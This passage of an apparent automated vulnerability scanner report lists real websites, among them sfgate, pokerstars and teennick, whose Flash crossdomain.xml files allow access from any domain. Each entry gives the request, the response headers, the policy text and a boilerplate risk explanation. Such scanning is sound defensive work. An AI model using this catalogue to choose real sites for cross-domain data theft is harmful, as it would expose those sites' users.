<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...
7.107. http://www.pittsburghlive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pittsburghlive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pittsburghlive.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:01 GMT
Server: Apache/2.2.3 (Red Hat) PHP/5.1.6
Last-Modified: Mon, 24 Jan 2011 21:35:59 GMT
Accept-Ranges: bytes
Content-Length: 455
Vary: Accept-Encoding,User-agent
Connection: close
Content-Type: text/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
       <site-control permitted-cross-domain-poli
...[SNIP]...
<allow-access-from domain="*" />
       <allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abacast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pittsburghlive.com"/>
...[SNIP]...
7.108. http://www.playfin.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.playfin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playfin.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 23:46:03 GMT
ETag: "1cf1115-c6-49c83001704c0"
Accept-Ranges: bytes
Content-Length: 198
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.109. http://www.pokerstars.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pokerstars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pokerstars.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:55 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 19:43:06 GMT
ETag: "5af-ece20680"
Accept-Ranges: bytes
Content-Length: 1455
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.pokerstarsblog.com"/>
<allow-access-from domain="*.pokerstars.com"/>
<allow-access-from domain="*.pokerstars.pl"/>
<allow-access-from domain="*.pokerstars.es"/>
<allow-access-from domain="*.pokerstars.fi"/>
<allow-access-from domain="*.pokerstars.hu"/>
<allow-access-from domain="*.pokerstars.nl"/>
<allow-access-from domain="*.pokerstars.se"/>
<allow-access-from domain="*.pokerstars.co.uk"/>
<allow-access-from domain="*.pokerstars.it"/>
<allow-access-from domain="*.pokerstars.si"/>
<allow-access-from domain="*.pokerstars.pt"/>
<allow-access-from domain="*.pokerstars.cz"/>
<allow-access-from domain="*.appt.com"/>
<allow-access-from domain="*.europeanpokertour.com"/>
<allow-access-from domain="*.wcoop.com"/>
<allow-access-from domain="*.pokerstars.tv"/>
<allow-access-from domain="*.joehachem.com"/>
<allow-access-from domain="*.chrismoneymaker.com"/>
<allow-access-from domain="*.greg-raymer.net"/>
<allow-access-from domain="*.andre-akkari.com"/>
<allow-access-from domain="*.danielnegreanu.ca"/>
<allow-access-from domain="*.hevad-khan.com"/>
<allow-access-from domain="*.lee-nelson.net"/>
<allow-access-from domain="*.vanessa-rousso.net"/>
<allow-access-from domain="*"/>
...[SNIP]...
7.110. http://www.popularscreensavers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popularscreensavers.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
ETag: W/"241-1301508774000"
Last-Modified: Wed, 30 Mar 2011 18:12:54 GMT
Content-Length: 241
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
<allow-access-from domain="*"/>
...[SNIP]...
7.111. http://www.rawtube.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rawtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rawtube.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 May 2009 01:35:39 GMT
ETag: "820f-13b-469c13a9090c0"
Content-Type: text/xml
Content-Length: 315
Via: www.rawtube.com
Date: Sat, 02 Apr 2011 12:32:31 GMT
X-Varnish: 863747465 862901038
Age: 3296
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...
7.112. http://www.realsimple.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.realsimple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realsimple.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:09 GMT
Server: Apache
Last-Modified: Tue, 06 Oct 2009 18:54:33 GMT
ETag: "2158b86-16c-47548c2caac40"
Accept-Ranges: bytes
Content-Length: 364
Content-Type: application/xml
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*.redcated" />
<allow-access-from domain="*.atlassolutions.com" />
<allow-access-from domain="*.akamai.net" />
...[SNIP]...
7.113. http://www.redorbit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.redorbit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.redorbit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:39 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 15:00:52 GMT
Accept-Ranges: bytes
Content-Length: 208
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...
7.114. http://www.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://www.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:110f"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:44:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...
7.115. http://www.sendspace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sendspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sendspace.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
ETag: "1797000725"
Last-Modified: Fri, 01 Apr 2011 07:15:01 GMT
Content-Length: 115
Connection: close
Date: Sat, 02 Apr 2011 14:08:28 GMT
Server: Apache

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>
7.116. http://www.sfgate.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sfgate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:16 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Set-Cookie: Apache=173.193.214.243.1301751796195568; path=/; max-age=31536000; domain=.sfgate.com
Last-Modified: Tue, 09 Jan 2007 23:06:08 GMT
ETag: "4d737b-cb-426a397623678"
Accept-Ranges: bytes
Content-Length: 203
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...
7.117. http://www.sheknows.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sheknows.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sheknows.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:25 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
X-Served-By: app3v-sk.wuo.lax2
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
7.118. http://www.shockwave.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shockwave.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shockwave.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Last-Modified: Wed, 25 Feb 2009 04:02:39 GMT
ETag: "11d7972a2-109-463b64e7f35c0"
Accept-Ranges: bytes
Content-Length: 265
Content-Type: application/xml
Cache-Control: max-age=624
Expires: Sat, 02 Apr 2011 13:55:06 GMT
Date: Sat, 02 Apr 2011 13:44:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.nick.com" secure="true" />
...[SNIP]...
7.119. http://www.slideshare.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slideshare.net

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/xml
Last-Modified: Fri, 01 Apr 2011 18:28:13 GMT
Expires: Sun, 03 Apr 2011 12:32:11 GMT
Cache-Control: max-age=86400
Content-Length: 222
Date: Sat, 02 Apr 2011 13:37:27 GMT
X-Varnish: 2056362629 2055719298
Age: 3916
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />

...[SNIP]...
7.120. http://www.spike.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spike.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.spike.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Last-Modified: Wed, 23 Jun 2010 15:37:40 GMT
ETag: "5db0a-102-489b4516c1900"
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:31:39 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:39 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...
7.121. http://www.sportsnetwork.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sportsnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sportsnetwork.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:44:06 GMT
Date: Sat, 02 Apr 2011 13:43:06 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 20 Jul 2009 16:18:35 GMT
ETag: "d2a1a8bb559ca1:160a"
Content-Length: 202

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...
7.122. http://www.swagbucks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swagbucks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.swagbucks.com

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: text/xml
Last-Modified: Thu, 11 Jun 2009 18:44:34 GMT
Accept-Ranges: bytes
ETag: "48a15aac4eac91:4dd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:55 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!--http://www.swagbucks.com/content/flash/crossdomain.xml-->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.123. http://www.syfy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.syfy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.syfy.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.12.2
Last-Modified: Mon, 14 Sep 2009 16:36:06 GMT
ETag: "9c9dd1-a3-4738c4325a980"
Accept-Ranges: bytes
Content-Length: 163
Content-Type: application/xml
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:11:19 GMT
Date: Sat, 02 Apr 2011 14:06:19 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 14:06:19 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>
<!-- !!!syfy!!! http://blog.scifi.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-policy>
7.124. http://www.tampabay.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tampabay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tampabay.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 13:39:21 GMT
Content-Type: text/xml
Connection: close
Cache-control: public,private
Last-modified: Mon, 23 Jun 2008 21:00:46 GMT
Etag: "52-48600efe"
X-Cacheable: YES
Content-Length: 82
X-Varnish: 380322934 380303585
Age: 283
Via: 1.1 varnish
X-Served-By: varnish-a
X-Cache: HIT
X-Cache-Hits: 2
X-Cache-Backend: default

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.125. http://www.tastebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tastebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tastebook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:10 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 22:16:25 GMT
Accept-Ranges: bytes
Content-Length: 146
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:14:10 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.tastebook.com/w3c/p3p.xml", CP="ALL DSP COR LAW CURa CONi OUR BUS IND PHY ONL UNI PUR COM NAV STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.126. http://www.teennick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.teennick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.teennick.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: W/"2563-1301085024000"
Last-Modified: Fri, 25 Mar 2011 20:30:24 GMT
Content-Length: 2563
Content-Type: text/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 14:18:01 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 20:18:01 GMT; path=/
Vary: User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.mtvi.com"/>
   <allow-access-from domain="*.nick.com"/>
   <allow-access-from domain="*.nickjr.com"/>
   <allow-access-from domain="*.nickjr-d.mtvi.com"/>
   <allow-access-from domain="*.nickjr-q.mtvi.com"/>
   <allow-access-from domain="*.nickonline.com"/>
   <allow-access-from domain="*.kids.nickonline.com"/>
   <allow-access-from domain="*.addictinggames.com"/>
   <allow-access-from domain="*.shockwave.com"/>    
   <allow-access-from domain="*.nickatnite.com"/>
   <allow-access-from domain="*.nickatnight.com"/>    
   <allow-access-from domain="*.magorium.com"/>    
   <allow-access-from domain="*.doubleclick*"/>
   <allow-access-from domain="*.the-n.com"/>
   <allow-access-from domain="*.theredspace.com"/>
   <allow-access-from domain="24.222.18.26"/>
   <allow-access-from domain="*.nicktoonsnetwork.com"/>
   <allow-access-from domain="*.mtvnservices.com"/>
   <allow-access-from domain="*.biggreenhelp.com"/>
   <allow-access-from domain="*.nick.co.kr"/>
   <allow-access-from domain="*.nicktv.it"/>
   <allow-access-from domain="*.popsicle.com"/>
   <allow-access-from domain="*.mtv.pl"/>
   <allow-access-from domain="96.10.20.67"/>    
   <allow-access-from domain="*.mua.nick-d.mtvi.com"/>
   <allow-access-from domain="*.mua.nick-q.mtvi.com"/>
   <allow-access-from domain="*.mua.nick.com"/>
   <allow-access-from domain="kca.gigya.s3.amazonaws.com"/>
   <allow-access-from domain="http://testing.arkadium.com"/>
...[SNIP]...
<allow-access-from domain="*.neopets.com"/>
   <allow-access-from domain="gamestudio.sarbakangames.com"/>
   <allow-access-from domain="*.scenic-d.mtvi.com/"/>
   <allow-access-from domain="*.scenic-q.mtvi.com/"/>
   <allow-access-from domain="*.scenic-l.mtvi.com/"/>
   <allow-access-from domain="live.toptrumps.com"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.127. http://www.terra.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.terra.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.terra.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:43 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301753983.130704; path=/; expires=Fri, 01-Jan-2016 00:02:22 GMT; domain=.terra.com
Last-Modified: Fri, 11 Jan 2008 15:27:05 GMT
ETag: "17bb6-91-44373f5718440"
Accept-Ranges: bytes
Content-Length: 145
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.terra.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.128. http://www.thedailybeast.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thedailybeast.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 22:58:12 GMT
ETag: "809660-112-7aae2900"
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:40:10 GMT
Content-Length: 274
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-p
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
7.129. http://www.thedailyshow.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailyshow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thedailyshow.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.1
Last-Modified: Mon, 09 Mar 2009 23:15:41 GMT
ETag: "20520-102-464b7d0294140"
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Cache-Control: max-age=971
Expires: Sat, 02 Apr 2011 13:47:58 GMT
Date: Sat, 02 Apr 2011 13:31:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...
7.130. http://www.theonion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theonion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

